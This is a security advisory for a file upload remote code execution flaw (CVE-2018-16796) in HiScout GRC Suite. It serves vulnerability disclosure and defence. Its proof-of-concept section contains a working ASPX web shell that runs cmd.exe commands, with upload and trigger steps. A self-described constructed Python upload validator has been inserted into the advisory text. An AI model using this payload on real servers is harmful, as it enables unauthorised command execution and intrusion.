
HiScout GRC Suite File Upload

Posted Sep 13, 2018
Authored by Sebastian Auwaerter | Site syss.de

HiScout GRC Suite versions prior to 3.1.5 suffer from a file upload vulnerability. An authenticated attacker with the permission to edit or add a "WebSiteElement" to the "content" pages is able to upload any file with any file extension to the data directory of the application. This directory is in the web root and the uploaded file is executed on the server if ".aspx" is chosen as the file extension and if the file contains aspx source code. Any commands can be executed with the permissions of the web server user on the server by exploiting this vulnerability.

tags | exploit, web, root, file upload
advisories | CVE-2018-16796
SHA-256 | 0b70d18c98e2aa3b7c8228963bae5c8015cb59571383b77778ec28287f564e35


Advisory ID: SYSS-2018-015
Product: HiScout GRC Suite
Manufacturer: HiScout GmbH
Affected Version(s): < 3.1.5
Tested Version(s): 3.1.3.12
Vulnerability Type: Unrestricted Upload of File with Dangerous Type
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2018-07-26
Solution Date: 2018-09-03
Public Disclosure: 2018-09-12
CVE Reference: CVE-2018-16796
Author of Advisory: Sebastian Auwaerter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

HiScout GRC Suite is a platform for managing IT governance, risk and
compliance.

The manufacturer describes the various modules of the
product as follows (see [1]):

The HiScout ISM module is geared toward meeting the requirements of the
ISO 27000 series of international standards, and provides a reliable
basis for the information management systems control loop.

The HiScout Grundschutz module fully supports operations toward BSI
standard 100-2. HiScout Grundschutz comes geared to BSI specifications
and can smoothly incorporate existing data from other tools, such as
GSTOOL. The HiScout BCM module is a new generation of BCM tools that can
generate quantifiable benefits even when there is no emergency, and is
therefore not only used to help you to plan for circumstances that will
hopefully never arise.

Because files uploaded in place of an image are checked neither for their
file extension nor for their content, HiScout GRC Suite is vulnerable to
remote code execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

An authenticated attacker with the permission to edit or add a
"WebSiteElement" to the "content" pages is able to upload any file
with any file extension to the data directory of the application. This
directory is in the web root and the uploaded file is executed on
the server if ".aspx" is chosen as the file extension and if the file
contains aspx source code. Any commands can be executed with the
permissions of the web server user on the server by exploiting this
vulnerability.
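The two checks the advisory says were missing, an extension allowlist and a content signature check, modelled as an added example in Python (this is not HiScout's code; the allowlist, the sample files and the function name are constructed for illustration):

```python
import os
import secrets

# Constructed allowlist for an image upload slot: each permitted extension is
# mapped to the magic bytes a file of that format must begin with.
ALLOWED_IMAGE_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def inspect_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Decide whether an upload may be stored as an image.

    Returns (True, safe_name) when the file passes both checks, or
    (False, reason) when it fails either one:
      1. extension allowlist, applied to the lower-cased basename so that
         'shell.ASPX', 'dir\\shell.aspx' and '../shell.aspx' are all caught;
      2. content signature, so a file that was merely renamed to '.png'
         but still holds ASP.NET source is caught as well.
    The returned name is random: the client-supplied name is never reused,
    which also removes any trick the parsing above did not anticipate.
    """
    if "\x00" in filename or not filename.strip():
        return False, "filename empty or contains a NUL byte"
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_IMAGE_TYPES:
        return False, f"extension {ext or '(none)'} is not an allowed image type"
    if not any(content.startswith(sig) for sig in ALLOWED_IMAGE_TYPES[ext]):
        return False, f"content does not start with a {ext} signature"
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed samples: the advisory's file name holding ASP.NET source, the
    # same source renamed to look like an image, and a genuine PNG header.
    aspx_source = b'<%@ Page Language="C#" %>\n<% Response.Write("x"); %>'
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, data in [("whoami.aspx", aspx_source),
                       ("whoami.png", aspx_source),
                       ("../logo.PNG", png_header)]:
        accepted, detail = inspect_upload(name, data)
        print(f"{name!r}: {'stored as ' if accepted else 'rejected: '}{detail}")
```

Since the advisory notes the data directory sits in the web root, the remaining measure is to store the accepted file outside the web root or in a location where the server is configured not to execute scripts, so that a bypass of either check does not lead to code execution.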

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To reproduce this issue on a German instance of HiScout GRC Suite,
choose "Inhalte" -> "Neu" -> "WebSiteElement" (the English equivalent
is "Content" -> "New" -> "WebSiteElement") and upload the following
file to the file upload on the right-hand side of the "InfoEditor":

filename: whoami.aspx
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<html>
<head>
<title>Code Execution PoC</title>
</head>
<body>
<%
String a = "whoami";
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+ a;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
String s = stmrdr.ReadToEnd();
stmrdr.Close();

Response.Write("<li>");
Response.Write(s);
Response.Write("</li>");
%>
</body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Now, either visit the uploaded file by navigating to
http(s)://<vulnerable-server>/<image-directory>/whoami.aspx or open the
page where the newly created "WebSiteElement" is shown and follow the
path of the "image" that is not loaded properly.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to software version 3.1.5.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-07-25: Vulnerability discovered
2018-07-26: Vulnerability reported to manufacturer
2018-09-03: Patch released by manufacturer
2018-09-12: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for HiScout BCM
https://www.hiscout.com/en/
[2] SySS Security Advisory SYSS-2018-015
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-015.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwaerter of SySS
GmbH.

E-Mail: sebastian.auwaerter at syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en